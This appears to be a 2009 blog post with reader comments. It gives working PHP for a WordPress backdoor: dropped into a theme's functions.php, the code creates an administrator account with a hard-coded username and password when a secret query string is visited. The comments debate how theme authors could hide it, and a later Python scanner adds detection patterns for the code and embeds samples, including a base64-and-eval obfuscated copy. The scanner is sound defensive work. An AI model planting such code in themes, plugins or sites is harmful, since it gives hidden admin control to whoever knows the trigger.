How To: Create Backdoor Admin Access in WordPress
Have you ever wanted an easy backdoor that auto-creates an administrator account in WordPress? The snippet below does just that. Place the code in your theme's functions.php file and upload it to your web server:
<?php
// Hooked to wp_head, so it runs on every front-end page load;
// the trigger is the ?backdoor=go query string.
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    // isset() avoids a PHP notice on every page load where the parameter is absent
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'go') {
        // wp_create_user() lives in registration.php in WordPress 2.x; an absolute
        // path makes the include independent of the current working directory
        // (from WordPress 3.1 on these functions are already loaded from user.php)
        require_once(ABSPATH . 'wp-includes/registration.php');
        if (!username_exists('brad')) {
            $user_id = wp_create_user('brad', 'pa55w0rd');
            // wp_create_user() returns a WP_Error on failure; only promote a real user ID
            if (!is_wp_error($user_id)) {
                $user = new WP_User($user_id);
                $user->set_role('administrator');
            }
        }
    }
}
?>
To trigger the code, simply visit http://example.com/?backdoor=go
When triggered, the code creates a new administrator account with the username brad and the password pa55w0rd. The function first checks that the account doesn't already exist before creating it.
Keep in mind that this code is a security risk: anyone who knows or guesses the query string can execute the function, the trigger URL ends up in server access logs and Referer headers, and the password is hard-coded in a file that is easy to read. If you use it at all as a recovery tool, change the trigger value and password, remove the snippet as soon as the account exists, and reset the password on first login. Also, don't be evil: only use this code for good!
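The comments below raise the obvious counter-question: how would a site owner spot this snippet if a theme or plugin author had slipped it in, possibly base64-encoded behind an eval()? The scanner below is an added example, not code from the original post or from WordPress. It walks a theme or plugin directory and flags PHP files that both create a user and grant the administrator role, and it first decodes any long base64 string literal so the eval(base64_decode(...)) variant is caught as well. The three sample files embedded in it are constructed for the demonstration, and the indicator names, the verdict thresholds and the scan_tree helper are my own heuristics, not a WordPress API.

```python
"""Scan WordPress theme/plugin PHP files for the admin-backdoor pattern shown above."""
import base64
import re
from pathlib import Path

# Constructed sample: the snippet from this post, as it would sit in functions.php.
SAMPLE_BACKDOOR = """<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('brad')) {
            $user_id = wp_create_user('brad', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
"""

# Constructed sample: the same code hidden behind base64 + eval, the variant
# a commenter below worries about ("encoded and inserted somewhere randomly").
_PAYLOAD = SAMPLE_BACKDOOR.replace("<?php\n", "")
SAMPLE_ENCODED = ("<?php\n$x = '" + base64.b64encode(_PAYLOAD.encode()).decode()
                  + "';\neval(base64_decode($x));\n")

# Constructed sample: ordinary theme code on the same hook that must not trigger.
SAMPLE_BENIGN = """<?php
add_action('wp_head', 'my_theme_meta');
function my_theme_meta() {
    echo '<meta name="generator" content="my-theme">';
}
"""

# Each indicator is one piece of the pattern; a verdict needs a combination of them.
INDICATORS = {
    "creates_user":    re.compile(r"\bwp_(?:create|insert)_user\s*\(", re.I),
    "grants_admin":    re.compile(r"(?:set_role|add_role|add_cap)\s*\(\s*['\"]"
                                  r"(?:administrator|edit_users|promote_users)['\"]", re.I),
    "request_trigger": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", re.I),
    "obfuscation":     re.compile(r"\b(?:eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}

# A quoted run of 40+ base64 characters is long enough to hide a function call.
_B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def decode_literals(src: str) -> str:
    """Append the decoded form of long base64 string literals so hidden code is scanned too."""
    extra = []
    for m in _B64_LITERAL.finditer(src):
        try:
            extra.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: leave it alone
    return src + "\n" + "\n".join(extra)


def scan_source(src: str) -> dict:
    """Return {indicator: [line numbers]} for every indicator present.

    Line numbers past the end of the file refer to text recovered from decoded literals.
    """
    text = decode_literals(src)
    hits = {}
    for name, rx in INDICATORS.items():
        lines = sorted({text.count("\n", 0, m.start()) + 1 for m in rx.finditer(text)})
        if lines:
            hits[name] = lines
    return hits


def verdict(hits: dict) -> str:
    """Heuristic (assumption): user creation plus admin grant is a backdoor,
    request-triggered obfuscated code is suspicious, bare obfuscation deserves review."""
    if "creates_user" in hits and "grants_admin" in hits:
        return "backdoor"
    if "obfuscation" in hits and "request_trigger" in hits:
        return "suspicious"
    if "obfuscation" in hits:
        return "review"
    return "clean"


def scan_tree(root) -> list:
    """Walk a theme/plugin directory and report every PHP file that is not clean."""
    results = []
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        v = verdict(hits)
        if v != "clean":
            results.append((str(path), v, hits))
    return results


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, v, hits in scan_tree(sys.argv[1]):
            print(f"{v:10} {path} {hits}")
    else:
        for label, src in (("backdoor", SAMPLE_BACKDOOR), ("encoded", SAMPLE_ENCODED),
                           ("benign", SAMPLE_BENIGN)):
            print(label, verdict(scan_source(src)))
```

Run it with a path to wp-content/themes or wp-content/plugins to get one line per file that is not clean; without arguments it scans the three embedded samples. Matching on the combination of indicators rather than on any single call keeps legitimate membership or onboarding plugins (which call wp_create_user with a subscriber role) out of the backdoor bucket, while the decode step defeats the simplest hiding trick; a determined author can still split strings or chain encodings, so treat a "review" verdict as a reason to read the file, not as a clean bill.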
Tags: admin, backdoor, code, WordPress
Trackback from Topsy.com ("Tweets that mention How To: Create Backdoor Admin Access in WordPress | Brad Williams Blog: Life of an Internet Startup"), December 29 2009 @ 2:52 pm:
[...] This post was mentioned on Twitter by Brad Williams, Darren Champen. Darren Champen said: RT @williamsba: New blog post: How To: Create Backdoor Admin Access in WordPress http://bit.ly/4UyhvM [...]
Daniel said, December 29 2009 @ 3:34 pm:
What you’re presenting here is way not fair.
Brad said, December 29 2009 @ 3:50 pm:
Not fair in what way Daniel?
Daniel said, December 29 2009 @ 4:57 pm:
Obviously, because someone may use it to hack into other people’s blogs.
Brad said, December 29 2009 @ 5:10 pm:
To set this code up you would need FTP access to a site. So technically you can't really hack a site with this code, but I see where you are coming from. That's why I said don't be evil.
Viper007Bond said, December 29 2009 @ 6:47 pm:
@Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.
Leland said, December 29 2009 @ 7:09 pm:
Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.
Keith said, December 29 2009 @ 7:20 pm:
It’s interesting.
I'm not a WP expert, but if a WordPress theme creator (such as Leland) inserted this code into a theme's functions.php file... couldn't he gain access to any blog using the user/pass defined in that code?
Just wondering, as I said, I’m not WP expert.
Tommy Vallier said, December 29 2009 @ 8:05 pm:
Keith,
Yeah – they could.
I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.
If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.
Daniel said, December 29 2009 @ 11:30 pm:
Prejudices, Brad?
As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterates so chances are they won’t even suspect it.
Viper007Bond said, December 30 2009 @ 6:52 am:
@Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.
Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.
Leland said, December 30 2009 @ 6:56 am:
@Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.
Also thanks Tommy for the response, that sounds like an interesting application as well.
Brad said, December 30 2009 @ 8:35 am:
Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.
Pingback from XSBlog2.0beta ("Backdoor in WordPress made easy | wordpress"), January 6 2010 @ 6:19 am:
[...] creates a user in WordPress and assigns it administrator rights, as shown in the post "How-To: Create Backdoor Admin Access in WordPress". The code sits in the template's functions.php and is triggered by a special request [...]